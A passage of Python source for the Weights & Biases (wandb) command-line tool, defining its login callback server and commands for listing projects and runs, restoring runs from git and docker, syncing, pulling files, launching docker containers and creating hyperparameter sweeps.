orig_type = '{}.{}'.format(self.orig_type.__module__,
self.orig_type.__name__)
if issubclass(self.orig_type, Error):
return click.style(str(self.message), fg="red")
else:
return ('An Exception was raised, see %s for full traceback.\n'
'%s: %s' % (log_file, orig_type, self.message))
class CallbackHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Simple callback handler that stores query string parameters and
shuts down the server.
"""
def do_GET(self):
self.server.result = urllib.parse.parse_qs(
self.path.split("?")[-1])
self.send_response(200)
self.end_headers()
self.wfile.write(b'Success')
self.server.stop()
def log_message(self, format, *args):
pass
class LocalServer():
"""A local HTTP server that finds an open port and listens for a callback.
The urlencoded callback url is accessed via `.qs` the query parameters passed
to the callback are accessed via `.result`
"""
def __init__(self):
self.blocking = True
self.port = 8666
self.connect()
self._server.result = {}
self._server.stop = self.stop
def connect(self, attempts=1):
try:
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', self.port), CallbackHandler)
except socket.error:
if attempts < 5:
self.port += random.randint(1, 1000)
self.connect(attempts + 1)
else:
logging.info(
"Unable to start local server, proceeding manually")
class FakeServer():
def serve_forever(self):
pass
self._server = FakeServer()
def qs(self):
return urllib.parse.urlencode({
"callback": "http://127.0.0.1:{}/callback".format(self.port)})
@property
def result(self):
return self._server.result
def start(self, blocking=True):
self.blocking = blocking
if self.blocking:
self._server.serve_forever()
else:
t = threading.Thread(target=self._server.serve_forever)
t.daemon = True
t.start()
def stop(self, *args):
t = threading.Thread(target=self._server.shutdown)
t.daemon = True
t.start()
if not self.blocking:
os.kill(os.getpid(), signal.SIGINT)
def display_error(func):
"""Function decorator for catching common errors and re-raising as wandb.Error"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except wandb.Error as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback)
logger.error(''.join(lines))
click_exc = ClickWandbException(e)
click_exc.orig_type = exc_type
six.reraise(ClickWandbException, click_exc, sys.exc_info()[2])
return wrapper
def prompt_for_project(ctx, entity):
"""Ask the user for a project, creating one if necessary."""
result = ctx.invoke(projects, entity=entity, display=False)
try:
if len(result) == 0:
project = click.prompt("Enter a name for your first project")
#description = editor()
project = api.upsert_project(project, entity=entity)["name"]
else:
project_names = [project["name"] for project in result]
question = {
'type': 'list',
'name': 'project_name',
'message': "Which project should we use?",
'choices': project_names + ["Create New"]
}
result = whaaaaat.prompt([question])
if result:
project = result['project_name']
else:
project = "Create New"
# TODO: check with the server if the project exists
if project == "Create New":
project = click.prompt(
"Enter a name for your new project", value_proc=api.format_project)
#description = editor()
project = api.upsert_project(project, entity=entity)["name"]
except wandb.apis.CommError as e:
raise ClickException(str(e))
return project
def editor(content='', marker='# Enter a description, markdown is allowed!\n'):
message = click.edit(content + '\n\n' + marker)
if message is not None:
return message.split(marker, 1)[0].rstrip('\n')
api = InternalApi()
# Some commands take project/entity etc. as arguments. We provide default
# values for those arguments from the current project configuration, as
# returned by api.settings()
CONTEXT = dict(default_map=api.settings())
class RunGroup(click.Group):
@display_error
def get_command(self, ctx, cmd_name):
# TODO: check if cmd_name is a file in the current dir and not require `run`?
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
return None
@click.command(cls=RunGroup, invoke_without_command=True)
@click.version_option(version=wandb.__version__)
@click.pass_context
def cli(ctx):
"""Weights & Biases.
Run "wandb docs" for full documentation.
"""
wandb.try_to_set_up_global_logging()
if ctx.invoked_subcommand is None:
click.echo(ctx.get_help())
@cli.command(context_settings=CONTEXT, help="List projects")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def projects(entity, display=True):
projects = api.list_projects(entity=entity)
if len(projects) == 0:
message = "No projects found for %s" % entity
else:
message = 'Latest projects for "%s"' % entity
if display:
click.echo(click.style(message, bold=True))
for project in projects:
click.echo("".join(
(click.style(project['name'], fg="blue", bold=True),
" - ",
str(project['description'] or "").split("\n")[0])
))
return projects
@cli.command(context_settings=CONTEXT, help="List runs in a project")
@click.pass_context
@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project you wish to list runs from.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def runs(ctx, project, entity):
click.echo(click.style('Latest runs for project "%s"' %
project, bold=True))
if project is None:
project = prompt_for_project(ctx, project)
runs = api.list_runs(project, entity=entity)
for run in runs:
click.echo("".join(
(click.style(run['name'], fg="blue", bold=True),
" - ",
(run['description'] or "").split("\n")[0])
))
@cli.command(context_settings=CONTEXT, help="List local & remote file status")
@click.argument("run", envvar=env.RUN_ID)
@click.option("--settings/--no-settings", help="Show the current settings", default=True)
@display_error
def status(run, settings):
logged_in = bool(api.api_key)
if not os.path.isdir(wandb_dir()):
if logged_in:
msg = "Directory not initialized. Please run %s to get started." % click.style(
"wandb init", bold=True)
else:
msg = "You are not logged in. Please run %s to get started." % click.style(
"wandb login", bold=True)
termlog(msg)
elif settings:
click.echo(click.style("Logged in?", bold=True) + " %s" % logged_in)
click.echo(click.style("Current Settings", bold=True))
settings = api.settings()
click.echo(json.dumps(
settings,
sort_keys=True,
indent=2,
separators=(',', ': ')
))
@cli.command(context_settings=CONTEXT, help="Restore code, config and docker state for a run")
@click.pass_context
@click.argument("run", envvar=env.RUN_ID)
@click.option("--no-git", is_flag=True, default=False, help="Skupp")
@click.option("--branch/--no-branch", default=True, help="Whether to create a branch or checkout detached")
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you wish to upload to.")
@click.option("--entity", "-e", envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def restore(ctx, run, no_git, branch, project, entity):
if ":" in run:
if "/" in run:
entity, rest = run.split("/", 1)
else:
rest = run
project, run = rest.split(":", 1)
elif run.count("/") > 1:
entity, run = run.split("/", 1)
project, run = api.parse_slug(run, project=project)
commit, json_config, patch_content, metadata = api.run_config(
project, run=run, entity=entity)
repo = metadata.get("git", {}).get("repo")
image = metadata.get("docker")
RESTORE_MESSAGE = """`wandb restore` needs to be run from the same git repository as the original run.
Run `git clone %s` and restore from there or pass the --no-git flag.""" % repo
if no_git:
commit = None
elif not api.git.enabled:
if repo:
raise ClickException(RESTORE_MESSAGE)
elif image:
wandb.termlog("Original run has no git history. Just restoring config and docker")
if commit and api.git.enabled:
subprocess.check_call(['git', 'fetch', '--all'])
try:
api.git.repo.commit(commit)
except ValueError:
wandb.termlog("Couldn't find original commit: {}".format(commit))
commit = None
files = api.download_urls(project, run=run, entity=entity)
for filename in files:
if filename.startswith('upstream_diff_') and filename.endswith('.patch'):
commit = filename[len('upstream_diff_'):-len('.patch')]
try:
api.git.repo.commit(commit)
except ValueError:
commit = None
else:
break
if commit:
wandb.termlog(
"Falling back to upstream commit: {}".format(commit))
patch_path, _ = api.download_write_file(files[filename])
else:
raise ClickException(RESTORE_MESSAGE)
else:
if patch_content:
patch_path = os.path.join(wandb.wandb_dir(), 'diff.patch')
with open(patch_path, "w") as f:
f.write(patch_content)
else:
patch_path = None
branch_name = "wandb/%s" % run
if branch and branch_name not in api.git.repo.branches:
api.git.repo.git.checkout(commit, b=branch_name)
wandb.termlog("Created branch %s" %
click.style(branch_name, bold=True))
elif branch:
wandb.termlog(
"Using existing branch, run `git branch -D %s` from master for a clean checkout" % branch_name)
api.git.repo.git.checkout(branch_name)
else:
wandb.termlog("Checking out %s in detached mode" % commit)
api.git.repo.git.checkout(commit)
if patch_path:
# we apply the patch from the repository root so git doesn't exclude
# things outside the current directory
root = api.git.root
patch_rel_path = os.path.relpath(patch_path, start=root)
# --reject is necessary or else this fails any time a binary file
# occurs in the diff
# we use .call() instead of .check_call() for the same reason
# TODO(adrian): this means there is no error checking here
subprocess.call(['git', 'apply', '--reject',
patch_rel_path], cwd=root)
wandb.termlog("Applied patch")
# TODO: we should likely respect WANDB_DIR here.
util.mkdir_exists_ok("wandb")
config = Config(run_dir="wandb")
config.load_json(json_config)
config.persist()
wandb.termlog("Restored config variables to %s" % config._config_path())
if image:
if not metadata["program"].startswith("<") and metadata.get("args") is not None:
# TODO: we may not want to default to python here.
runner = util.find_runner(metadata["program"]) or ["python"]
command = runner + [metadata["program"]] + metadata["args"]
cmd = " ".join(command)
else:
wandb.termlog("Couldn't find original command, just restoring environment")
cmd = None
wandb.termlog("Docker image found, attempting to start")
ctx.invoke(docker, docker_run_args=[image], cmd=cmd)
return commit, json_config, patch_content, repo, metadata
@cli.command(context_settings=CONTEXT, help="Upload an offline training directory to W&B")
@click.pass_context
@click.argument("path", nargs=-1, type=click.Path(exists=True))
@click.option("--id", envvar=env.RUN_ID, help="The run you want to upload to.")
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you want to upload to.")
@click.option("--entity", "-e", envvar=env.ENTITY, help="The entity to scope to.")
@click.option("--ignore", help="A comma seperated list of globs to ignore syncing with wandb.")
@display_error
def sync(ctx, path, id, project, entity, ignore):
if api.api_key is None:
ctx.invoke(login)
if ignore:
globs = ignore.split(",")
else:
globs = None
path = path[0] if len(path) > 0 else os.getcwd()
if os.path.isfile(path):
raise ClickException("path must be a directory")
wandb_dir = os.path.join(path, "wandb")
run_paths = glob.glob(os.path.join(wandb_dir, "*run-*"))
if len(run_paths) == 0:
run_paths = glob.glob(os.path.join(path, "*run-*"))
if len(run_paths) > 0:
for run_path in run_paths:
wandb_run.Run.from_directory(run_path,
run_id=run_path.split("-")[-1], project=project, entity=entity, ignore_globs=globs)
else:
wandb_run.Run.from_directory(
path, run_id=id, project=project, entity=entity, ignore_globs=globs)
@cli.command(context_settings=CONTEXT, help="Pull files from Weights & Biases")
@click.argument("run", envvar=env.RUN_ID)
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you want to download.")
@click.option("--entity", "-e", default="models", envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def pull(run, project, entity):
project, run = api.parse_slug(run, project=project)
urls = api.download_urls(project, run=run, entity=entity)
if len(urls) == 0:
raise ClickException("Run has no files")
click.echo("Downloading: {project}/{run}".format(
project=click.style(project, bold=True), run=run
))
for name in urls:
if api.file_current(name, urls[name]['md5']):
click.echo("File %s is up to date" % name)
else:
length, response = api.download_file(urls[name]['url'])
# TODO: I had to add this because some versions in CI broke click.progressbar
sys.stdout.write("File %s\r" % name)
dirname = os.path.dirname(name)
if dirname != '':
wandb.util.mkdir_exists_ok(dirname)
with click.progressbar(length=length, label='File %s' % name,
fill_char=click.style('&', fg='green')) as bar:
with open(name, "wb") as f:
for data in response.iter_content(chunk_size=4096):
f.write(data)
bar.update(len(data))
@cli.command(context_settings=CONTEXT, help="Login to Weights & Biases")
@click.argument("key", nargs=-1)
@click.option("--host", default=None, help="Login to a specific instance of W&B")
@click.option("--browser/--no-browser", default=True, help="Attempt to launch a browser for login")
@click.option("--anonymously", is_flag=True, help="Log in anonymously")
@display_error
def login(key, host, anonymously, server=LocalServer(), browser=True, no_offline=False):
global api
if host == "https://api.wandb.ai":
api.clear_setting("base_url", globally=True)
elif host:
if not host.startswith("http"):
raise ClickException("host must start with http(s)://")
api.set_setting("base_url", host, globally=True)
key = key[0] if len(key) > 0 else None
# Import in here for performance reasons
import webbrowser
browser = util.launch_browser(browser)
def get_api_key_from_browser(signup=False):
if not browser:
return None
query = '?signup=true' if signup else ''
webbrowser.open_new_tab('{}/authorize{}'.format(api.app_url, query))
#Getting rid of the server for now. We would need to catch Abort from server.stop and deal accordingly
#server.start(blocking=False)
#if server.result.get("key"):
# return server.result["key"][0]
return None
if key:
util.set_api_key(api, key)
else:
if anonymously:
os.environ[env.ANONYMOUS] = "must"
# Don't allow signups or dryrun for local
local = host != None or host != "https://api.wandb.ai"
key = util.prompt_api_key(api, input_callback=click.prompt,
browser_callback=get_api_key_from_browser, no_offline=no_offline, local=local)
if key:
api.clear_setting('disabled')
click.secho("Successfully logged in to Weights & Biases!", fg="green")
elif not no_offline:
api.set_setting('disabled', 'true')
click.echo("Disabling Weights & Biases. Run 'wandb login' again to re-enable.")
# reinitialize API to create the new client
api = InternalApi()
return key
@cli.command(context_settings=CONTEXT, help="Configure a directory with Weights & Biases")
@click.pass_context
@display_error
def init(ctx):
from wandb import _set_stage_dir, __stage_dir__, wandb_dir
if __stage_dir__ is None:
_set_stage_dir('wandb')
if os.path.isdir(wandb_dir()) and os.path.exists(os.path.join(wandb_dir(), "settings")):
click.confirm(click.style(
"This directory has been configured previously, should we re-configure it?", bold=True), abort=True)
else:
click.echo(click.style(
"Let's setup this directory for W&B!", fg="green", bold=True))
if api.api_key is None:
ctx.invoke(login)
viewer = api.viewer()
# Viewer can be `None` in case your API information became invalid, or
# in testing if you switch hosts.
if not viewer:
click.echo(click.style(
"Your login information seems to be invalid: can you log in again please?", fg="red", bold=True))
ctx.invoke(login)
# This shouldn't happen.
viewer = api.viewer()
if not viewer:
click.echo(click.style(
"We're sorry, there was a problem logging you in. Please send us a note at support@wandb.com and tell us how this happened.", fg="red", bold=True))
sys.exit(1)
# At this point we should be logged in successfully.
if len(viewer["teams"]["edges"]) > 1:
team_names = [e["node"]["name"] for e in viewer["teams"]["edges"]]
question = {
'type': 'list',
'name': 'team_name',
'message': "Which team should we use?",
'choices': team_names + ["Manual Entry"]
}
result = whaaaaat.prompt([question])
# result can be empty on click
if result:
entity = result['team_name']
else:
entity = "Manual Entry"
if entity == "Manual Entry":
entity = click.prompt("Enter the name of the team you want to use")
else:
entity = click.prompt("What username or team should we use?",
default=viewer.get('entity', 'models'))
# TODO: this error handling sucks and the output isn't pretty
try:
project = prompt_for_project(ctx, entity)
except wandb.cli.ClickWandbException:
raise ClickException('Could not find team: %s' % entity)
api.set_setting('entity', entity)
api.set_setting('project', project)
api.set_setting('base_url', api.settings().get('base_url'))
util.mkdir_exists_ok(wandb_dir())
with open(os.path.join(wandb_dir(), '.gitignore'), "w") as file:
file.write("*\n!settings")
click.echo(click.style("This directory is configured! Next, track a run:\n", fg="green") +
textwrap.dedent("""\
* In your training script:
{code1}
{code2}
* then `{run}`.
""").format(
code1=click.style("import wandb", bold=True),
code2=click.style("wandb.init(project=\"%s\")" % project, bold=True),
run=click.style("python <train.py>", bold=True),
# saving this here so I can easily put it back when we re-enable
# push/pull
# """
# * Run `{push}` to manually add a file.
# * Pull popular models into your project with: `{pull}`.
# """
# push=click.style("wandb push run_id weights.h5", bold=True),
# pull=click.style("wandb pull models/inception-v4", bold=True)
))
@cli.command(context_settings=CONTEXT, help="Open documentation in a browser")
@click.pass_context
@display_error
def docs(ctx):
import webbrowser
if util.launch_browser():
launched = webbrowser.open_new_tab(DOCS_URL)
else:
launched = False
if launched:
click.echo(click.style(
"Opening %s in your default browser" % DOCS_URL, fg="green"))
else:
click.echo(click.style(
"You can find our documentation here: %s" % DOCS_URL, fg="green"))
@cli.command("on", help="Ensure W&B is enabled in this directory")
@display_error
def on():
wandb.ensure_configured()
api = InternalApi()
try:
api.clear_setting('disabled')
except configparser.Error:
pass
click.echo(
"W&B enabled, running your script from this directory will now sync to the cloud.")
@cli.command("off", help="Disable W&B in this directory, useful for testing")
@display_error
def off():
wandb.ensure_configured()
api = InternalApi()
try:
api.set_setting('disabled', 'true')
click.echo(
"W&B disabled, running your script from this directory will only write metadata locally.")
except configparser.Error as e:
click.echo(
'Unable to write config, copy and paste the following in your terminal to turn off W&B:\nexport WANDB_MODE=dryrun')
RUN_CONTEXT = copy.copy(CONTEXT)
RUN_CONTEXT['allow_extra_args'] = True
RUN_CONTEXT['ignore_unknown_options'] = True
@cli.command(context_settings=RUN_CONTEXT, help="Launch a job")
@click.pass_context
@click.argument('program')
@click.argument('args', nargs=-1)
@click.option('--id', default=None,
help='Run id to use, default is to generate.')
@click.option('--resume', default='never', type=click.Choice(['never', 'must', 'allow']),
help='Resume strategy, default is never')
@click.option('--dir', default=None,
help='Files in this directory will be saved to wandb, defaults to wandb')
@click.option('--configs', default=None,
help='Config file paths to load')
@click.option('--message', '-m', default=None, hidden=True,
help='Message to associate with the run.')
@click.option('--name', default=None,
help='Name of the run, default is auto generated.')
@click.option('--notes', default=None,
help='Notes to associate with the run.')
@click.option("--show/--no-show", default=False,
help="Open the run page in your default browser.")
@click.option('--tags', default=None,
help='Tags to associate with the run (comma seperated).')
@click.option('--run_group', default=None,
help='Run group to associate with the run.')
@click.option('--job_type', default=None,
help='Job type to associate with the run.')
@display_error
def run(ctx, program, args, id, resume, dir, configs, message, name, notes, show, tags, run_group, job_type):
wandb.ensure_configured()
if configs:
config_paths = configs.split(',')
else:
config_paths = []
config = Config(config_paths=config_paths,
wandb_dir=dir or wandb.wandb_dir())
tags = [tag for tag in tags.split(",") if tag] if tags else None
# populate run parameters from env if not specified
id = id or os.environ.get(env.RUN_ID)
message = message or os.environ.get(env.DESCRIPTION)
tags = tags or env.get_tags()
run_group = run_group or os.environ.get(env.RUN_GROUP)
job_type = job_type or os.environ.get(env.JOB_TYPE)
name = name or os.environ.get(env.NAME)
notes = notes or os.environ.get(env.NOTES)
resume = resume or os.environ.get(env.RESUME)
run = wandb_run.Run(run_id=id, mode='clirun',
config=config, description=message,
program=program, tags=tags,
group=run_group, job_type=job_type,
name=name, notes=notes,
resume=resume)
run.enable_logging()
environ = dict(os.environ)
if configs:
environ[env.CONFIG_PATHS] = configs
if show:
environ[env.SHOW_RUN] = 'True'
if not run.api.api_key:
util.prompt_api_key(run.api, input_callback=click.prompt)
try:
rm = run_manager.RunManager(run)
rm.init_run(environ)
except run_manager.Error:
exc_type, exc_value, exc_traceback = sys.exc_info()
wandb.termerror('An Exception was raised during setup, see %s for full traceback.' %
util.get_log_file_path())
wandb.termerror(str(exc_value))
if 'permission' in str(exc_value):
wandb.termerror(
'Are you sure you provided the correct API key to "wandb login"?')
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback)
logger.error('\n'.join(lines))
sys.exit(1)
rm.run_user_process(program, args, environ)
@cli.command(context_settings=RUN_CONTEXT, help="Launch local W&B container (Experimental)")
@click.pass_context
@click.option('--port', '-p', default="8080", help="The host port to bind W&B local on")
@click.option('--daemon/--no-daemon', default=True, help="Run or don't run in daemon mode")
@click.option('--upgrade', is_flag=True, default=False, help="Upgrade to the most recent version")
@click.option('--edge', is_flag=True, default=False, help="Run the bleading edge", hidden=True)
@display_error
def local(ctx, port, daemon, upgrade, edge):
if not find_executable('docker'):
raise ClickException(
"Docker not installed, install it from https://docker.com" )
if wandb.docker.image_id("wandb/local") != wandb.docker.image_id_from_registry("wandb/local"):
if upgrade:
subprocess.call(["docker", "pull", "wandb/local"])
else:
wandb.termlog("A new version of W&B local is available, upgrade by calling `wandb local --upgrade`")
running = subprocess.check_output(["docker", "ps", "--filter", "name=wandb-local", "--format", "{{.ID}}"])
if running != b"":
if upgrade:
subprocess.call(["docker", "restart", "wandb-local"])
exit(0)
else:
wandb.termerror("A container named wandb-local is already running, run `docker kill wandb-local` if you want to start a new instance")
exit(1)
image = "docker.pkg.github.com/wandb/core/local" if edge else "wandb/local"
command = ['docker', 'run', '--rm', '-v', 'wandb:/vol', '-p', port+':8080', '--name', 'wandb-local']
host = "http://localhost:%s" % port
api.set_setting("base_url", host, globally=True)
if daemon:
command += ["-d"]
command += [image]
# DEVNULL is only in py3
try:
from subprocess import DEVNULL
except ImportError:
DEVNULL = open(os.devnull, 'wb')
code = subprocess.call(command, stdout=DEVNULL)
if daemon:
if code != 0:
wandb.termerror("Failed to launch the W&B local container, see the above error.")
exit(1)
else:
wandb.termlog("W&B local started at http://localhost:%s \U0001F680" % port)
wandb.termlog("You can stop the server by running `docker kill wandb-local`")
if not api.api_key:
ctx.invoke(login, host=host)
@cli.command(context_settings=RUN_CONTEXT)
@click.pass_context
@click.option('--keep', '-N', default=24, help="Keep runs created in the last N hours", type=int)
def gc(ctx, keep):
"""Garbage collector, cleans up your local run directory"""
directory = wandb.wandb_dir()
if not os.path.exists(directory):
raise ClickException('No wandb directory found at %s' % directory)
paths = glob.glob(directory+"/*run*")
dates = [datetime.datetime.strptime(p.split("-")[1],'%Y%m%d_%H%M%S') for p in paths]
since = datetime.datetime.utcnow() - datetime.timedelta(hours=keep)
bad_paths = [paths[i] for i, d, in enumerate(dates) if d < since]
if len(bad_paths) > 0:
click.echo("Found {} runs, {} are older than {} hours".format(len(paths), len(bad_paths), keep))
click.confirm(click.style(
"Are you sure you want to remove %i runs?" % len(bad_paths), bold=True), abort=True)
for path in bad_paths:
shutil.rmtree(path)
click.echo(click.style("Success!", fg="green"))
else:
click.echo(click.style("No runs older than %i hours found" % keep, fg="red"))
@cli.command(context_settings=RUN_CONTEXT, name="docker-run")
@click.pass_context
@click.argument('docker_run_args', nargs=-1)
@click.option('--help')
def docker_run(ctx, docker_run_args, help):
"""Simple docker wrapper that adds WANDB_API_KEY and WANDB_DOCKER to any docker run command.
This will also set the runtime to nvidia if the nvidia-docker executable is present on the system
and --runtime wasn't set.
"""
args = list(docker_run_args)
if len(args) > 0 and args[0] == "run":
args.pop(0)
if help or len(args) == 0:
wandb.termlog("This commands adds wandb env variables to your docker run calls")
subprocess.call(['docker', 'run'] + args + ['--help'])
exit()
#TODO: is this what we want?
if len([a for a in args if a.startswith("--runtime")]) == 0 and find_executable('nvidia-docker'):
args = ["--runtime", "nvidia"] + args
#TODO: image_from_docker_args uses heuristics to find the docker image arg, there are likely cases
#where this won't work
image = util.image_from_docker_args(args)
resolved_image = None
if image:
resolved_image = wandb.docker.image_id(image)
if resolved_image:
args = ['-e', 'WANDB_DOCKER=%s' % resolved_image] + args
else:
wandb.termlog("Couldn't detect image argument, running command without the WANDB_DOCKER env variable")
if api.api_key:
args = ['-e', 'WANDB_API_KEY=%s' % api.api_key] + args
else:
wandb.termlog("Not logged in, run `wandb login` from the host machine to enable result logging")
subprocess.call(['docker', 'run'] + args)
@cli.command(context_settings=RUN_CONTEXT)
@click.pass_context
@click.argument('docker_run_args', nargs=-1)
@click.argument('docker_image', required=False)
@click.option('--nvidia/--no-nvidia', default=find_executable('nvidia-docker') != None,
help='Use the nvidia runtime, defaults to nvidia if nvidia-docker is present')
@click.option('--digest', is_flag=True, default=False, help="Output the image digest and exit")
@click.option('--jupyter/--no-jupyter', default=False, help="Run jupyter lab in the container")
@click.option('--dir', default="/app", help="Which directory to mount the code in the container")
@click.option('--no-dir', is_flag=True, help="Don't mount the current directory")
@click.option('--shell', default="/bin/bash", help="The shell to start the container with")
@click.option('--port', default="8888", help="The host port to bind jupyter on")
@click.option('--cmd', help="The command to run in the container")
@click.option('--no-tty', is_flag=True, default=False, help="Run the command without a tty")
@display_error
def docker(ctx, docker_run_args, docker_image, nvidia, digest, jupyter, dir, no_dir, shell, port, cmd, no_tty):
"""W&B docker lets you run your code in a docker image ensuring wandb is configured. It adds the WANDB_DOCKER and WANDB_API_KEY
environment variables to your container and mounts the current directory in /app by default. You can pass additional
args which will be added to `docker run` before the image name is declared, we'll choose a default image for you if
one isn't passed:
wandb docker -v /mnt/dataset:/app/data
wandb docker gcr.io/kubeflow-images-public/tensorflow-1.12.0-notebook-cpu:v0.4.0 --jupyter
wandb docker wandb/deepo:keras-gpu --no-tty --cmd "python train.py --epochs=5"
By default we override the entrypoint to check for the existance of wandb and install it if not present. If you pass the --jupyter
flag we will ensure jupyter is installed and start jupyter lab on port 8888. If we detect nvidia-docker on your system we will use
the nvidia runtime. If you just want wandb to set environment variable to an existing docker run command, see the wandb docker-run
command.
"""
if not find_executable('docker'):
raise ClickException(
"Docker not installed, install it from https://docker.com")
args = list(docker_run_args)
image = docker_image or ""
# remove run for users used to nvidia-docker
if len(args) > 0 and args[0] == "run":
args.pop(0)
if image == "" and len(args) > 0:
image = args.pop(0)
# If the user adds docker args without specifying an image (should be rare)
if not util.docker_image_regex(image.split("@")[0]):
if image:
args = args + [image]
image = wandb.docker.default_image(gpu=nvidia)
subprocess.call(["docker", "pull", image])
_, repo_name, tag = wandb.docker.parse(image)
resolved_image = wandb.docker.image_id(image)
if resolved_image is None:
raise ClickException(
"Couldn't find image locally or in a registry, try running `docker pull %s`" % image)
if digest:
sys.stdout.write(resolved_image)
exit(0)
existing = wandb.docker.shell(
["ps", "-f", "ancestor=%s" % resolved_image, "-q"])
if existing:
question = {
'type': 'confirm',
'name': 'attach',
'message': "Found running container with the same image, do you want to attach?",
}
result = whaaaaat.prompt([question])
if result and result['attach']:
subprocess.call(['docker', 'attach', existing.split("\n")[0]])
exit(0)
cwd = os.getcwd()
command = ['docker', 'run', '-e', 'LANG=C.UTF-8', '-e', 'WANDB_DOCKER=%s' % resolved_image, '--ipc=host',
'-v', wandb.docker.entrypoint+':/wandb-entrypoint.sh', '--entrypoint', '/wandb-entrypoint.sh']
if nvidia:
command.extend(['--runtime', 'nvidia'])
if not no_dir:
#TODO: We should default to the working directory if defined
command.extend(['-v', cwd+":"+dir, '-w', dir])
if api.api_key:
command.extend(['-e', 'WANDB_API_KEY=%s' % api.api_key])
else:
wandb.termlog("Couldn't find WANDB_API_KEY, run `wandb login` to enable streaming metrics")
if jupyter:
command.extend(['-e', 'WANDB_ENSURE_JUPYTER=1', '-p', port+':8888'])
no_tty = True
cmd = "jupyter lab --no-browser --ip=0.0.0.0 --allow-root --NotebookApp.token= --notebook-dir %s" % dir
command.extend(args)
if no_tty:
command.extend([image, shell, "-c", cmd])
else:
if cmd:
command.extend(['-e', 'WANDB_COMMAND=%s' % cmd])
command.extend(['-it', image, shell])
wandb.termlog("Launching docker container \U0001F6A2")
subprocess.call(command)
MONKEY_CONTEXT = copy.copy(CONTEXT)
MONKEY_CONTEXT['allow_extra_args'] = True
MONKEY_CONTEXT['ignore_unknown_options'] = True
@cli.command(context_settings=MONKEY_CONTEXT, help="Run any script with wandb", hidden=True)
@click.pass_context
@click.argument('program')
@click.argument('args', nargs=-1)
@display_error
def magic(ctx, program, args):
def magic_run(cmd, globals, locals):
try:
exec(cmd, globals, locals)
finally:
pass
sys.argv[:] = args
sys.argv.insert(0, program)
sys.path.insert(0, os.path.dirname(program))
try:
with open(program, 'rb') as fp:
code = compile(fp.read(), program, 'exec')
except IOError:
click.echo(click.style("Could not launch program: %s" % program, fg="red"))
sys.exit(1)
globs = {
'__file__': program,
'__name__': '__main__',
'__package__': None,
'wandb_magic_install': magic_install,
}
prep = '''
import __main__
__main__.__file__ = "%s"
wandb_magic_install()
''' % program
magic_run(prep, globs, None)
magic_run(code, globs, None)
@cli.command(context_settings=CONTEXT, help="Create a sweep")
@click.pass_context
@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project of the sweep.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity scope for the project.")
@click.option('--controller', is_flag=True, default=False, help="Run local controller")
@click.option('--verbose', is_flag=True, default=False, help="Display verbose output")
@click.option('--name', default=False, help="Set sweep name")
@click.option('--program', default=False, help="Set sweep program")
@click.option('--settings', default=False, help="Set sweep settings", hidden=True)
@click.option('--update', default=None, help="Update pending sweep")
@click.argument('config_yaml')
@display_error
def sweep(ctx, project, entity, controller, verbose, name, program, settings, update, config_yaml):
def _parse_settings(settings):
"""settings could be json or comma seperated assignments."""
ret = {}
# TODO(jhr): merge with magic_impl:_parse_magic
if settings.find('=') > 0:
for item in settings.split(","):
kv = item.split("=")
if len(kv) != 2:
wandb.termwarn("Unable to parse sweep settings key value pair", repeat=False)
ret.update(dict([kv]))
return ret
wandb.termwarn("Unable to parse settings parameter", repeat=False)
return ret
if api.api_key is None:
termlog("Login to W&B to use the sweep feature")
ctx.invoke(login, no_offline=True)
sweep_obj_id = None
if update:
parts = dict(entity=entity, project=project, name=update)
err = util.parse_sweep_id(parts)
if err:
wandb.termerror(err)
return
entity = parts.get("entity") or entity
project = parts.get("project") or project
sweep_id = parts.get("name") or update
found = api.sweep(sweep_id, '{}', entity=entity, project=project)
if not found:
wandb.termerror('Could not find sweep {}/{}/{}'.format(entity, project, sweep_id))
return
sweep_obj_id = found['id']
wandb.termlog('{} sweep from: {}'.format(
'Updating' if sweep_obj_id else 'Creating',
config_yaml))
try:
yaml_file = open(config_yaml)
except (OSError, IOError):
wandb.termerror('Couldn\'t open sweep file: %s' % config_yaml)
return
try:
config = util.load_yaml(yaml_file)
except yaml.YAMLError as err:
wandb.termerror('Error in configuration file: %s' % err)
return
if config is None:
wandb.termerror('Configuration file is empty')
return
# Set or override parameters
if name:
config["name"] = name
if program:
config["program"] = program
if settings:
settings = _parse_settings(settings)
if settings:
config.setdefault("settings", {})
config["settings"].update(settings)
if controller:
config.setdefault("controller", {})
config["controller"]["type"] = "local"
is_local = config.get('controller', {}).get('type') == 'local'
if is_local:
tuner = wandb_controller.controller()
err = tuner._validate(config)
if err:
wandb.termerror('Error in sweep file: %s' % err)
return
entity = entity or env.get_entity() or config.get('entity')
project = project or env.get_project() or config.get('project') or util.auto_project_name(
config.get("program"), api)
sweep_id = api.upsert_sweep(config, project=project, entity=entity, obj_id=sweep_obj_id)
wandb.termlog('{} sweep with ID: {}'.format(
'Updated' if sweep_obj_id else 'Created',
click.style(sweep_id, fg="yellow")))
sweep_url = wandb_controller._get_sweep_url(api, sweep_id)
if sweep_url:
wandb.termlog("View sweep at: {}".format(
click.style(sweep_url, underline=True, fg='blue')))
# reprobe entity and project if it was autodetected by upsert_sweep
entity = entity or env.get_entity()
project = project or env.get_project()
if entity and project:
sweep_path = "{}/{}/{}".format(entity, project, sweep_id)
elif project:
sweep_path = "{}/{}".format(project, sweep_id)
else:
sweep_path = sweep_id
wandb.termlog("Run sweep agent with: {}".format(
click.style("wandb agent %s" % sweep_path, fg="yellow")))
if controller:
wandb.termlog('Starting wandb controller...')
tuner = wandb_controller.controller(sweep_id)
tuner.run(verbose=verbose)
@cli.command(context_settings=CONTEXT, help="Run the W&B agent")
@click.pass_context
